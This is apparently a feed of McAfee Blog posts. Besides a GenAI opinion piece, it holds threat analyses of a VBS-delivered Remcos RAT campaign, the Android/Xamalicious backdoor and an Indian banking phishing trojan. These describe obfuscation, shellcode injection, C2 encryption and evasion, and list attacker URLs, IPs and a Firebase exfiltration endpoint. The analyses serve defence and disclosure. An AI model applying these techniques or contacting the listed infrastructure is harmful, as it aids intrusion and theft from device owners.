b044804cf731cd7dd79000b7c6abce7b642402b275c1eb25712607fc1e5e3d2b  chrome  vfqhqd.msk.xux.njs 
bf102125a6fca5e96aed855b45bbed9aa0bc964198ce207f2e63a71487ad793a  chrome  hohoj.vlcwu.lm.ext 
e72f46f15e50ce7cee5c4c0c5a5277e8be4bb3dd23d08ea79e1deacb8f004136  chrome  enech.hg.rrfy.wrlpp 
f6323f8d8cfa4b5053c65f8c1862a8e6844b35b260f61735b3cf8d19990fef42  chrome  gqjoyp.cixq.zbh.llr 

 

The post MoqHao evolution: New variants start automatically right after installation appeared first on McAfee Blog.

Generative AI: Cross the Stream Where it is Shallowest

7 February 2024 at 18:04

The explosive growth of Generative AI has sparked many questions and considerations not just within tech circles, but in mainstream society in general. Both the advancement of the technology, and the easy access means that virtually anyone can leverage these tools, and much of 2023 was spent discovering new ways that Generative AI could be used to solve problems or better our lives.

However, in the rush to apply this transformative technology, we should also keep in mind “Maslow’s Hammer.” Attributed to Abraham Maslow, best known for outlining a hierarchy of needs, Maslow’s Hammer highlights an over-reliance on a single tool, a concept popularly summarized as “If all you have is a hammer, everything looks like a nail.” As corporations navigate the continuing evolution of AI, we need to be certain that we’re applying it where it makes the most sense, and not just because we can. This will ultimately save time, money, and energy that can be applied to building robust tools and solutions for viable use cases.

Recognizing when to use GenAI and when not to use it is a necessary skill set for full-stack domain-specific data scientists, engineers, and executives.

Running GenAI is expensive and not without tradeoffs. As of today, careless planning of a GenAI application can lead to a negative return on investment (due to the excessive operational cost), scalability and downtime issues (due to limited computing resources), and serious damage to the customer experience and brand reputation (due to the potential generation of improper content, hallucinations, mis/disinformation, misleading advice, etc.). Organizations struggle to control these variables in general, and the negative impacts and limitations must be offset by a huge value proposition.

One interesting aspect that can be observed across industries is the unexpected (but welcomed) side effects of going through the GenAI voyage, as some sort of eye-opening epiphany. How do we balance this risk/reward? What should we be looking at and what are the questions we should be asking to ensure that we’re successfully applying (or not) AI?

Breaking free from the complexity bias: as humans, we tend to favor and give credit to complex solutions only (known as ‘complexity bias’). Unfortunately, this particularly applies to GenAI applications nowadays, as we are influenced and “self-forced” to use GenAI to solve all problems. Just because “it seems to work”, it doesn’t mean it’s the best/optimal solution. It is by following this logic that some teams may have a significant chance of discovering that there are simpler (probably non-GenAI) means of solving some of these real-world problems (or parts of the problem!). Achieving this revelation requires a humble mind that is open to the possibility of considering that we don’t always need the most complex or expensive solution, even if it’s fancy and we can afford it.

It’s not always all or nothing: one aspect that works only for a few companies but not for most is the need to run GenAI all the time. If your business case is not around selling or supporting GenAI infrastructure, then you are likely using GenAI as a tool to accomplish domain-specific goals. If so, what every player in the industry would want is to maximize value while minimizing operational costs. At the current cost of running GenAI, the most obvious answer to achieve that is to avoid running it as much as possible, while still delivering most of the desired value. This delicate trade-off is a smart and elegant way of tackling the problem: not dismissing the value provided by GenAI nor obsessively using it up to the point that yields negative ROI. How do you achieve this? That’s likely the secret sauce of your domain-specific application area.

Ethical downsizing: GenAI models can be (and usually are) quite big. While this might be required for a few scenarios, it’s not necessary for most real-world domain-specific applications, as several GenAI authors are finding out across the industry (e.g., Phi-2). As such, it’s not only important for your business but also for humanity that we learn to downsize and optimize GenAI models as much as possible. It not only brings efficiency to your use case (cost saving, inference speed, lighter footprint, reduced risk, etc.) but also accomplishes a responsible use of the technology that is respectful of human resources. Each time you save a kilowatt or a few seconds of inference per user, you are explicitly contributing to a sustainable future where GenAI is leveraged to maximize value while minimizing environmental impact, and that’s something to be proud of.

Cross the stream where it is shallowest…

The key is to be humble enough to seek the optimal path: keep an open mind to consider non-GenAI solutions to your problems first. If GenAI is truly the best way to go, then find out if you really need to run it all the time or just sometimes. And finally, downsize as much as possible, not just because of cost and speed, but because of social responsibility.

GenAI is clearly having a moment with demonstrated potential. At the same time, being able to recognize the technical and financial downsides of GenAI is as important for the healthy development of the industry. In the same way we don’t use the hammer for every task at home, we should continuously ask: Is this problem worth GenAI? And is the value provided by this technology (when applied to my domain-specific use case) going to exceed the operational shortcomings? It is with this mindset that the industry will make significant and responsible progress in solving problems with a diverse but efficient set of tools. Let’s continue exploring and building the fascinating world of GenAI, without forgetting what our ultimate goals are.

The post Generative AI: Cross the Stream Where it is Shallowest appeared first on McAfee Blog.

From Email to RAT: Deciphering a VB Script-Driven Campaign

17 January 2024 at 18:41

Authored by Preksha Saxena and Yashvi Shah

McAfee Labs has been tracking a sophisticated VBS campaign characterized by obfuscated Visual Basic Scripting (VBS). Initially delivering the AgentTesla malware, the campaign has evolved into a multi-faceted threat, employing VBS scripts as a versatile delivery mechanism. Notably, this campaign extends beyond AgentTesla, now distributing a range of malware such as Guloader, Remcos RAT, Xworm, and Lokibot.

This campaign illustrates a comprehensive infection process initiated by a VBS file delivered via email. Starting with the activation of a VBS script, it progresses through PowerShell phases, utilizing the BitsTransfer utility for fetching a second-stage PowerShell script. The decoded and executed Shellcode A conceals and loads Shellcode B. In the final phase, wab.exe downloads the encrypted Remcos RAT payload. Shellcode B decrypts and injects it into wab.exe, making it function as the Remcos RAT.

The observed campaign has been noted for targeting diverse regions worldwide. Presented below is a geographical heatmap depicting McAfee customers who have been targeted and saved over the past three months.

Figure 1: Geo Heatmap showing targeted regions.

In the featured blog post, malicious actors utilized GuLoader to deploy the Remcos RAT.

Execution Chain

Figure 2: Infection chain

The execution begins by running a VBS script. then it triggers the execution of the first-stage PowerShell. Subsequently, the BitsTransfer utility is employed to fetch a second-stage PowerShell which is base64 encoded.

The second stage PowerShell is then encoded and executed. Following this, the First Shellcode is meticulously carved out and loaded reflectively. The second Shellcode encoded within Shellcode A, undergoes decoding and is also reflectively loaded.

The final step involves a second Shellcode which is leveraged to retrieve and inject the Remcos RAT (Remote Control and Surveillance Tool) into a legitimate Windows process. In this case, wab.exe. This intricate series of actions allows for the stealthy deployment and operation of the Remcos RAT within the Windows environment.

Figure 3: Process Tree

Obfuscated VBScript Technical Overview:

Stage 1: (Deobfuscating vbs)

Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023“, resembling an invoice to the user. The intent, much like similar deceptive emails, is for the recipient not to scrutinize the email closely.

Inside the zip file attachment is a heavily obfuscated VBS file. The VBS script employed several techniques to make the analysis quite difficult. It has many garbage variables, decoy functions, and unnecessary comments, and all the malicious functions are obfuscated.

Figure 4: Heavily obfuscated script

The code appears streamlined after removing redundant lines, resulting in a more concise and efficient version. After removing all the comments, the script turned out to be as follows:

Figure 5: Post-removing the junk code

In the script, there’s a frequent appending of new strings to the variable “Fu6”. This method serves to increase the complexity of the analysis. Once all the strings are concatenated and formatted, the result emerges in a more intriguing manner. As shown in the below image.

Figure 6: After deobfuscating the code

The function “Mikr9” will handle the conversion of strings, rendering them readable. We converted all the lines to a readable format, with the help of the “Fu6” function. For example, as shown in Figure 5, the string

‘DelfhAdvetFagstStatpYapp:Nona/fisk/Indh1 Sic0 Tra3parc. Mon1Gens7Vide6Eufo.Tast1Outs1Midd1afte.Dors1husg6 Hal3Beja/ Hypm RenuColonSprgdNasahToasuRafflchon.GyttpBrnefMuckbAcci ‘ became http://103.176.111[.]163/mundhul.pfb.

Likewise, the entire script is decoded, and we get the following script:

Figure 7: After applying decrypting function Mikr9()

The script conducts the following sequence of activities:

  • Retrieves the second-level file from “hxxp://103.176.111[.]163/mundhul.pfb” using BitsTransfer.
  • Save the acquired file in the Appdata folder.
  • Decodes the file from Base64, converting it into a string format.
  • Navigates to offset 229981 and extracts the subsequent 28050 units of data.
  • Executes the extracted data using IEX (Invoke-Expression).

Stage 2:

Powershell execution

The file retrieved shows zero detection on VT, appears to be base64 encoded, and has a size of 336KB.

Figure 8: Second Powershell script

Figure 9: Content is base64 encoded

Upon decoding “mundhul.pfb,” a detailed analysis can be conducted to comprehend its functionality, enabling further examination of the malware’s execution. Once the file gets decoded, it reveals a code resembling the image provided below.

Figure 10: Base64 decoded data

As specified in the script, execute a jump to offset 229981 and retrieve the ensuing 28050 units of data. This marks the start of the second PowerShell script, which is 28050 bytes, marked as follows.

Figure 11: Start of encrypted second PowerShell

The code contains various comments, so we followed the same procedure, as we did for the first script, removed all the junk code and we got a function that seems to handle the decryption of all the strings.

</centerFigure 12: After removing the junk

The decryption process iterates multiple times to unveil the strings, and the malware employs the “Invoke” method to execute its commands. After decoding all the strings using “Bedroges02” function, we finally got the intent of the script.

Figure 13: After applying decryption logic

The PowerShell script initially loads the VirtualAlloc() function and stores the memory handle in variables named “trll3” and “Akuammin195”. These sections possess permissions for writing, reading, and executing. The latter segment of the script appears to invoke a concealed shellcode embedded within it.

The execution sequence involves copying the bytes as follows: The initial 644 bytes from the beginning of this PowerShell script constitute the first shellcode. Subsequently, starting from byte 644, the script copies the next 229337 bytes, constituting the second shellcode.

Figure 14: Constituting shellcode

Following the execution sequence, malware initiates the API call CallWindowProcA, leading subsequently to the invocation of the native function NtProtectVirtualMemory. Then the process transitions directly to initiating the first shellcode.

Stage 3: Shellcode-A execution

The shellcode-A’s primary action involves copying the shellcode B into memory, as depicted in the figure below.

Figure 15: Loop used for copying shellcode B

The shellcode B undergoes decryption via XOR operation. This operation serves to transform the code into its executable form, allowing the decrypted shellcode to execute its intended instructions within the system’s memory.

Figure 16: Decryption loop used for decrypting shellcode B

Stage 4: Shellcode-B

The shellcode is designed to establish a new process named “wab.exe” and it replicates 0x3FC4000 bytes of decrypted shellcode into its memory space. As indicated by the highlighted blue box, the content decrypted from the second shellcode (shown in Figure 15) is subsequently injected into the wab.exe process (depicted in Figure 16).

Figure 17: Injection of second shellcode

The objective of the shellcode is to fetch the Remcos RAT from the specified URL, “hxxp://103.176.111.163/lnHxQotdQb132.bin” and subsequently inject it into the “wab.exe” process. Once “wab.exe” is injected by the final payload, it undertakes all malicious activities.

Figure 18: wab.exe connecting to C2

The file obtained from the provided URL seems to be an encrypted binary. Upon decryption, it has been recognized to initiate communication with the IP address 94.156.65.197 through port 2404. An observation revealed the creation of a mutex named “Rmc-R7V4VM.” Data keylogged during its operation is stored in a file labeled “logs.dat.” Additionally, screenshots captured are saved in a directory named “Screenshots,” while the overall repository for the collected data is titled “Remcos.”

Conclusion:

This campaign outlines the comprehensive infection process initiated by a VBS file received through email. The process begins with the activation of a VBS script, initiating the initial PowerShell phase. Subsequently, the BitsTransfer utility is used to fetch a second-stage PowerShell script, encoded in base64. After decoding and execution, the first Shellcode is carefully extracted and loaded reflectively. Simultaneously, Shellcode A conceals and loads the decoded Shellcode B.

In the final phase, the injected wab.exe proceeds to download the encrypted final payload of the Remcos RAT. Shellcode B is responsible for decrypting the payload, and it is subsequently injected into wab.exe. Consequently, this particular instance of wab.exe functions as the Remcos RAT.

VBScript in the Windows Environment: A Security Perspective

VBScript, introduced by Microsoft in 1996, was crucial in the Windows environment as a scripting language for task automation, tightly integrated with Internet Explorer, and a key component of technologies like Windows Script Host, Active Server Pages, and Office automation. It provided a simple scripting solution for system tasks, web development, and server-side logic. Microsoft is deprecating VBScript, and it will be available as a feature on-demand before eventual removal from Windows, said the company. This decision aligns with a broader strategy to reduce malware campaigns exploiting Windows and Office features. VBScript, disabled by default in Internet Explorer 11 since 2019, has been used by malicious actors for distributing malware, and Microsoft aims to enhance security by eliminating this infection vector. Attackers exploit vulnerabilities in phased-out technologies due to lingering use in legacy systems, slow adoption of updates, custom applications, stringent industry requirements, and user resistance to change. To mitigate risks, proactive measures such as prompt updates, security education, and staying informed about software lifecycles are crucial.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

  • Verify Sender Information
  • Think Before Clicking
  • Check for Spelling and Grammar
  • Be Cautious with Email Content
  • Verify Unusual Requests
  • Implement Email Filters
  • Check for Secure Connections
  • Report Suspicious Emails
  • Keep the software up-to-date
  • Align with security patches

IOCs

VBS file 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4
Second PowerShell 5d21216a92ffea5b8ba70f48f9bcbb8a530a9b272423ae3ba519dbf74a905a65
Final payload 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978
URL1 hxxp://103.176.111[.]163/mundhul.pfb
URL2 hxxp://103.176.111[.]163/lnHxQotdQb132.bin
IP address 103.176.111[.]163
IP address 94.156.65[.]197
Mutex Rmc-R7V4VM

 

The post From Email to RAT: Deciphering a VB Script-Driven Campaign appeared first on McAfee Blog.

Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices

22 December 2023 at 19:34

Authored by Fernando Ruiz 

McAfee Mobile Research Team identified an Android backdoor implemented with Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#. Dubbed Android/Xamalicious it tries to gain accessibility privileges with social engineering and then it communicates with the command-and-control server to evaluate whether or not to download a second-stage payload that’s dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps among other actions financially motivated without user consent.

The second stage payload can take full control of the infected device due to the powerful accessibility services that were already granted during the first stage which also contains functions to self-update the main APK which means that it has the potential to perform any type of activity like a spyware or banking trojan without user interaction. However, we identified a link between Xamalicious and the ad-fraud app “Cash Magnet” which automatically clicks ads, installs apps, and other actions to fraudulently generate revenue while users that installed it may earn points that are supposed to be redeemable as a retail gift card. This means that the developers behind these threats are financially motivated and drive ad-fraud therefore this might be one of the main payloads of Xamalicious.

The usage of the Xamarin framework allowed malware authors to stay active and without detection for a long time, taking advantage of the build process for APK files that worked as a packer to hide the malicious code. In addition, malware authors also implemented different obfuscation techniques and custom encryption to exfiltrate data and communicate with the command-and-control server. 

We’ve identified about 25 different malicious apps that carry this threat. Some variants have been distributed on Google Play since mid-2020. The apps identified in this report were proactively removed by Google from Google Play ahead of our reporting. McAfee is a member of the App Defense Alliance and an active partner in the malware mitigation program, which aims to quickly find Potentially Harmful Applications (PHAs) and stop them before they ever make it onto Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices. McAfee Mobile Security detects this threat as Android/Xamalicious.  

Based on the number of installations these apps may have compromised at least 327,000 devices from Google Play plus the installations coming from third-party markets that continually produce new infections based on the detection telemetry of McAfee clients around the world. This threat remains very active. 

 

Figure 1. “Count Easy Calorie Calculator” was available on Google Play on August 2022 and carries Android/Xamalicious 

Android/Xamalicious trojans are apps related to health, games, horoscope, and productivity. Most of these apps are still available for download in third-party marketplaces.  

Previously we detected malware abusing Xamarin framework such as the open-sourced AndroSpy and forked versions of it, but Xamalicious is implemented differently. Technical details about Xamarin architecture are well documented and detail how .NET code is interpreted by Android using Mono. 

Obtaining Accessibility Services

Let’s use the app “Numerology: Personal horoscope & Number predictions” as an example. Once started it immediately requests the victim to enable accessibility services for “correct work” and provides directions to activate this permission:  

 

Figure 2. Tricking users into granting accessibility services permission 

Users need to manually activate the accessibility services after several OS warnings such as the following on the accessibility options: 

Figure 3. Accessibility services configuration prompt highlights the risks of this permission. 

Where is the malicious code? 

This is not the traditional Java code or native ELF Android application, the malware module was written originally in .NET and compiled into a dynamic link library (DLL). Then it is LZ4 compressed, and it might be embedded into a BLOB file, or directly available in the /assemblies directory on the APK structure. This code is loaded then by a native library (ELF) or by the DEX file at runtime level. In simple words, this means that in some samples the reversing of the DLL assemblies is straightforward while in others it requires extra steps to unpack them. 

The malicious code is usually available in two different assembly files in the /assemblies directory on the apk. Usually, file names are core.dll and a <package-specific>.dll.

Some malware variants has obfuscated the DLL assemblies to avoid analysis and reversing of the malicious code while others keep the original code available.  

 

Figure 4. Core.dll and GoogleService.dll contain malicious code. 

Communication with the command-and-control server

Once accessibility permissions are granted the malware initiates communication with the malicious server to dynamically load a second-stage payload.  

Figure 5. App execution and communication with the malicious server 

Collect Device Information 

Android/Xamalicious collects multiple device data including the list of installed applications obtained via system commands to determine if the infected victim is a good target for the second stage payload. The malware can collect location, carrier, and network information among device rooting status, adb connectivity configuration, for instance, if the device is connected via ADB or is rooted, the C2 will not provide a second-stage payload DLL for download. 

Method/Command  Description 
DevInfo  Hardware and device information that includes: 
  • Android Id 
  • Brand, CPU, Model, Fingerprint, Serial 
  • OS Version, release, SDK 
  • Language 
  • Developer Option status 
  • Language 
  • SIM Information (operator, state, network type, etc) 
  • Firmware, firmware version 
GeoInfo  Location of the device based on IP address, the malware contacts services such as api.myip.com to verify the device location and ISP data. 
  • ISP Name 
  • Organization 
  • Services 

FraudScore: Self-protection to identify if the device is not a real user 

EmuInfo  It lists all adbProperties that in a real device are around 640 properties. This list is encoded as a string param in URL encoded format. 

This data may be used to determinate if the affected client is a real device or emulator since it contains params such as: 

  • CPU 
  • Memory  
  • Sensors 
  • USB Configuration 
  • ADB Status 
RootInfo  After trying to identify if the device is rooted or not with multiple techniques the output is consolidated in this command 
Packages  It uses the system commands “pm list packages -s” and “pm list packages -3” to list system and installed apps on the device. 
Accessibility  It provides the status if accessibility services permissions are granted or not 
GetURL  This command only provides the Android Id and it’s a request for the second-stage payload. The C2 evaluates the provided client request and returns a status and an encrypted assembly DLL. 

Data Encryption in JWT 

To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it’s encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm however the RSA key values used by the Xamalicious are hardcoded in the decompiled malicious DLL so decryption of transmitted information is possible if C2 infrastructure is available during the analysis. 

In the Send() function Android/Xamalicious first prepares the received object, usually a JSON structure calling the function encrypt() which creates the JWT using a hardcoded RSA key. So the data is exfiltrated fully encrypted to the malware host pointing to the path  “/Updater” via HTTP POST method. 

Then it waits for the C2 response and passes it to the decrypt() function which has a hardcoded RSA private key to properly decrypt the received command which might contain a second stage payload for the “getURL” command. 

Encrypt Method: 

Figure 6. Encrypt function with hardcoded RSA Key values as XML string 

The decryption method is also hardcoded into malware which allowed the research team to intercept and decrypt the communication from the C2 using the RSA key values provided as XML string it’s possible to build a certificate with the parameters to decrypt the JWE tokens content. 

C2 evaluation

Collected data is transmitted to the C&C to determine if the device is a proper target to download a second-stage payload. The self-protection mechanism of the malware authors goes beyond traditional emulation detection and country code operator limitations because in this case, the command-and-control server will not deliver the second stage payload if the device is rooted or connected as ADB via USB or does not have a SIM card among multiple other environment validations. 

DLL Custom Encryption 

With the getURL command, the infected client requests the malicious payload, if the C&C Server determines that the device is “Ok” to receive the malicious library it will encrypt a DLL with Advanced encryption standard (AES) in Cipher block chaining (CBC) using a custom key for the client that requested it based on the device id and other parameters explained below to decrypt the code since it’s a symmetric encryption method, the same key works for encryption and decryption of the payload. 

Delivers the Payload in JWT 

The encrypted DLL is inserted as part of the HTTP response in the encrypted JSON Web Token “JWT”. Then the client will receive the token, decrypt it, and then decrypt the ‘url’ parm with AES CBC and a custom key.  

The AES key used to decrypt the assembly is unique per infected device and its string of 32 chars of length contains appended the device ID, brand, model, and a hardcoded padding of “1” up to 32 chars of length. 

For instance, if the device ID is 0123456ABCDEF010 and the affected device is a Pixel 5, then the AES key is: “0123456ABCDEF010googlePixel 5111” 

This means that the DLL has multiple layers of encryption. 

  1. It’s a HTTPS protected.
  2. It’s encrypted as a JWE Token using RSA-OAEP with a 128CBC-HS256 algorithm.
  3. URL parameter that contains the DLL is encrypted with AES and encoded as base64 

All these efforts are related to hiding the payload and trying to stay under the radar where this threat had relative success since some variants might have been active years ago without AV detections. 

DLL Injected 

Xamalicious will name this DLL “cache.bin” and store it in the local system to finally dynamically load it using the Assembly.Load method. 

Figure 7. Loading of second stage payload using Assembly.Load method. 

Once the second stage payload has been loaded the device can be fully compromised because once accessibility permissions are granted, it can obverse and interact with any activity opening a backdoor to any type of malicious activity. 

During the analysis, the downloaded second stage payload contained a DLL with the class “MegaSDKXE” which was obfuscated and incomplete probably because the C2 didn’t receive the expected params to provide the complete malicious second stage that might be limited to a specific carrier, language, app installed, location, time zone or unknown conditions of the affected device, however, we can assure that this is a high-risk backdoor that leaves the possibility to dynamically execute any command on the affected device not limited to spying, impersonation or as a financially motivated malware. 

Cash Magnet Ad-Fraud and Xamalicious

One of the Xamalicious samples detected by McAfee Mobile generic signatures was “LetterLink” (com.regaliusgames.llinkgame) which was available on Google Play at the end of 2020, with a book icon. It was poorly described as a hidden version of “Cash Magnet”: An app that performs ad-fraud with automated clicker activity, apps downloads, and other tasks that lead to monetization for affiliate marketing. This application offers users points that are supposed to be redeemable by retail gift cards or cryptocurrency.

Figure 8a. LetterLink login page after running the app for the first time.

Figure 8b. LetterLink agreement for Cash Magnet

Originally published in 2019 on Google Play, “Cash Magnet” (com.uicashmagnet) was described as a passive income application offering users to earn up to $30 USD per month running automated ads. Since it was removed by Google the authors then infiltrated LetterLink and more recently “Dots: One Line Connector” (com.orlovst.dots) which are hidden versions of the same ad-fraud scheme.

Figure 9. LetterLink Icon that hides Cash Magnet

“LetterLink” performs multiple Xamalicious activities since it contains the “core.dll” library, it connects to the same C2 server, and it uses the same hardcoded private RSA certificate to build the JWE encrypted tokens which provide a non-repudiation proof that the developers of Cash Magnet are behind Xamalicious.

Figure 10. Cash Magnet infiltrated the app as a Game, available until the end of 2023

“Dots: One Line Connector” app is not a game, the screenshot published by Google Play does not correspond to the application behavior because once it is started it just asks for authentication credentials without any logo or reference to Cash Magnet. “Dots” does not contain the same DLLs as its predecessor, however the communication with the C2 is similar using the same RSA key parameters. We reported this app to Google and they promptly removed it from Google Play.

Affected Users 

Based on our telemetry we observed that more affected users are in the American continent with the most activity in the USA, Brazil, and Argentina. In Europe, clients also reported the infection, especially in the UK, Spain, and Germany. 

Figure 11. McAfee detections Android/Xamalicious around the world 

Conclusion 

Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets. 

Avoid using apps that require accessibility services unless there is a genuine need for use. If a new app tries to convince you to activate accessibility services claiming that it’s required without a real and reasonable reason and requesting to ignore the operative system warning, then it’s a red flag. 

The second stage payload might take control of the device because accessibility permissions are granted so any other permission or action can then be performed by the malware if these instructions are provided in the injected code. 

Because it is difficult for users to actively deal with all these threats, we strongly recommend that users install security software on their devices and always keep up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. 

Android/Xamalicious Samples Distributed on Google Play: 

Package Name  App Name  Installs 
com.anomenforyou.essentialhoroscope  Essential Horoscope for Android       100,000  
com.littleray.skineditorforpeminecraft  3D Skin Editor for PE Minecraft       100,000  
com.vyblystudio.dotslinkpuzzles  Logo Maker Pro       100,000  
com.autoclickrepeater.free  Auto Click Repeater          10,000  
com.lakhinstudio.counteasycaloriecalculator  Count Easy Calorie Calculator          10,000  
com.muranogames.easyworkoutsathome  Sound Volume Extender            5,000  
com.regaliusgames.llinkgame  LetterLink            1,000  
com.Ushak.NPHOROSCOPENUMBER  NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS            1,000  
com.browgames.stepkeepereasymeter  Step Keeper: Easy Pedometer                500  
com.shvetsStudio.trackYourSleep  Track Your Sleep                500  
com.devapps.soundvolumebooster  Sound Volume Booster                100  
com.Osinko.HoroscopeTaro  Astrological Navigator: Daily Horoscope & Tarot                100  
com.Potap64.universalcalculator  Universal Calculator                100  

Indicators of Compromise 

Hash PackageName
7149acb072fe3dcf4dcc6524be68bd76a9a2896e125ff2dddefb32a4357f47f6 com.android.accessibility.service
a5de2dc4e6005e75450a0df0ea83816996092261f7dac30b5cf909bf6daaced0 com.android.accessibility.service
22803693c21ee17667d764dd226177160bfc2a5d315e66dc355b7366b01df89b com.android.callllogbacup
efbb63f9fa17802f3f9b3a0f4236df268787e3d8b7d2409d1584d316dabc0cf9 com.android.dreammusic
e801844333031b7fd4bd7bb56d9fb095f0d89eb89d5a3cc594a4bed24f837351 com.android.statementsandservices
5fffb10487e718634924552b46e717bbcbb6a4f9b1fed02483a6517f9acd2f61 com.android.ui.clock
81a9a6c86b5343a7170ae5abd15f9d2370c8282a4ed54d8d28a3e1ab7c8ae88e com.android.ui.clock
9c646516dd189cab1b6ced59bf98ade42e19c56fc075e42b85d597449bc9708b com.android.version.shared
dfdca848aecb3439b8c93fd83f1fd4036fc671e3a2dcae9875b4648fd26f1d63 com.anomenforyou.essentialhoroscope
e7ffcf1db4fb13b5cb1e9939b3a966c4a5a894f7b1c1978ce6235886776c961e com.autoclickrepeater.free
8927ff14529f03cbb2ebf617c298f291c2d69be44a8efa4e0406dea16e53e6f9 com.autoclickrepeater.free
117fded1dc51eff3788f1a3ec2b941058ce32760acf61a35152be6307f6e2052 com.browgames.stepkeepereasymeter
28a4ae5c699a7d96e963ca5ceec304aa9c4e55bc661e16c194bdba9a8ad847b7 com.devapps.soundvolumebooster
b0b9a8e9ec3d0857b70464617c09ffffce55671b227a9fdbb178be3dbfebe8ed com.kolomia.mineskineditor
899b0f186c20fdbfe445b4722f4741a5481cd3cbcb44e107b8e01367cccfdda3 com.lakhinstudio.counteasycaloriecalculator
e52b65fdcb77ed4f5989a69d57f1f53ead58af43fa4623021a12bc11cebe29ce com.lakhinstudio.counteasycaloriecalculator
e694f9f7289677adaf2c2e93ba0ac24ae38ab9879a34b86c613dd3c60a56992d com.littleray.skineditorforpeminecraft
19ffe895b0d1be65847e01d0e3064805732c2867ce485dfccc604432faadc443 com.muranogames.easyworkoutsathome
6a3455ff881338e9337a75c9f2857c33814b7eb4060c06c72839b641b347ed36 com.Osinko.HoroscopeTaro
e6668c32b04d48209d5c71ea96cb45a9641e87fb075c8a7697a0ae28929913a6 com.Potap64.universalcalculator
6953ba04233f5cf15ab538ae191a66cb36e9e0753fcaeeb388e3c03260a64483 com.regaliusgames.llinkgame
01c56911c7843098777ec375bb5b0029379b0457a9675f149f339b7db823e996 com.shvetsStudio.trackYourSleep
3201785a7de8e37e5d12e8499377cfa3a5b0fead6667e6d9079d8e99304ce815 com.turovskyi.magicofnumbers
acb5de2ed2c064e46f8d42ee82feabe380364a6ef0fbfeb73cf01ffc5e0ded6b com.Ushak.NPHOROSCOPENUMBER
9b4dc1e80a4f4c798d0d87a52f52e28700b5b38b38a532994f70830f24f867ba com.Ushak.NPHOROSCOPENUMBER
1bfc02c985478b21c6713311ca9108f6c432052ea568458c8bd7582f0a825a48 com.vyblystudio.dotslinkpuzzles

The post Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices appeared first on McAfee Blog.

Shielding Against Android Phishing in Indian Banking

20 December 2023 at 15:40

Authored by Neil Tyagi and Fernando Ruiz

In a digitally evolving world, the convenience of banking through mobile applications has revolutionized financial transactions. However, this advancement has also opened doors to a lesser-known adversary: Android phishing. Join us as we delve into the clandestine realm of cyber threats targeting India’s banking sector.

This blog uncovers the nuances of an Android phishing/banking trojan application identified as Android/Banker.AFX illustrates a common procedure from cybercriminals designed to drain the bank accounts of their victims:

First broadcasting phishing messages via WhatsApp and luring users to install an app that carries malicious code hidden as a verification tool. Once installed, the banking trojan can collect personal and financial information plus intercept SMS messages with the objective of stealing one-time passwords or verification codes that are required to complete transactions which may lead to stealing the banking account assets.

This trojan is just a variant and example of multiple banking trojans implementations recently observed in the wild that carry similar risks, which is not technically sophisticated but might be very effective and prevalent especially when it’s widely distributed on social media. McAfee Mobile Security protects broadly and generically against this type of banking trojans.

This blog explores the insidious tactics, alarming trends, and preventive measures against the rising tide of phishing attacks plaguing Android users in India’s financial landscape.

Distribution Method: Messaging platforms

  • The initial lure is an alarming WhatsApp message prompting the user to download an Android Package (APK) to complete a mandatory verification procedure carried out by financial institutions known as Know Your Customer (KYC) else the account would be blocked.

A sense of urgency is created for the user by warning him that the account would be blocked if he doesn’t install the APK and provide the necessary information to complete the KYC form.

These seemingly innocent prompts, meticulously crafted by cybercriminals, possess a cunning sophistication that mirrors the legitimate communication channels of banking institutions. They prey upon human curiosity, fear, and desire, tricking users into taking immediate actions that, at first glance, seem innocuous but have far-reaching consequences.

Installation and execution

Since the app installer is triggered by Whatsapp, the installation by default should be blocked by Android unless the user previously allowed the installation of unknown apps from this source.

A warning is displayed after taping on the APK icon:

However, if users ignore the warning, they may deactivate this important security feature with just two clicks:

Now Android OS is warning about the risk of allowing the installation of unknown apps from WhatsApp. However, many users allow this option, which poses a high risk of infection.

Once the Trojan is installed, the victims will get the financial institution icon on their Android app list:

After installation, it abuses the icon of SBI to confuse the user.

Opening for the first time, it asks for SMS-related permissions.

The application’s landing page is similar to the net banking page of Real SBI.
This phishing site is locally loaded from the malware into a WebView.

The application asks for the user’s username, password, and phone number.

The Captcha used here is static. It does not change ever because all content is hardcoded locally.

As part of the KYC validation lure process, the malware collects sensitive user information such as:

  • Full Name, Date of Birth
  • Account, CIF, PAN, and Aadhar Numbers
  • Credit card information

After the victim inputs all the information, they are presented with a fake KYC validation code, which makes it look like a genuine procedure the user might not be suspicious about the app or the process.

Additionally, this banking trojan intercepts SMS messages and abuses Firebase to communicate with attackers. During the analysis the malware transmitted all collected information including credit card information to:

wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb

According to the static analysis, any received SMS message would also be exfiltrated to the attackers’ servers via the opened socket communication since the app has granted SMS reading permissions at the first execution. This is implemented to extract any OTP required to complete transactions of the victim.

 

Exfiltrated credit card information from the local static site loaded by the malware abuses the  Cordova framework. Credit card information, along with all collected information, is transmitted to the attackers using Firebase, a legitimate service that’s also abused by criminals.

 

Static Analysis

 

  • This malware requires common permissions however it’s important to highlight that RECEIVE_SMS is a very dangerous permissions that should only be granted to apps that are related to messaging that you trust. If apps installed from third-party sources require it, it’s a red flag:
    • INTERNET
    • REQUEST_INSTALL_PACKAGES
    • RECEIVE_SMS
    • ACCESS_NETWORK_STATE

 

  • Information collected by the phishing site:
    • username
    • password
    • phone number
    • date of birth
    • account number
    • CIF number
    • pan number
    • debit card number
